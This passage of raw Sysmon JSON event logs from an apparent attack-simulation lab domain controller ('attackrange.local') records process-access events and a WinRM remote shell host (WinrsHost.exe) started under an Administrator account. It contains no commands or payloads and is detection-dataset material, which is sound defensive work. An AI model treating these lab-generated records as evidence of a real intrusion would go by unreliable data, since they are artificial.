07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4336,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.001\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.001","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4337,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.001\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 420\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.001","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"420","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4338,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.016\r\nProcessGuid: {41C8662E-20BB-5F25-0000-001017620600}\r\nProcessId: 4800\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BB-5F25-0000-0020E0610600}\r\nLogonId: 0x661E0\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.016","ProcessGuid":"{41C8662E-20BB-5F25-0000-001017620600}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4339,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.001\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-001017620600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.001","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-001017620600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4340,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-001017620600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-001017620600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4341,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4342,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4343,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4344,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 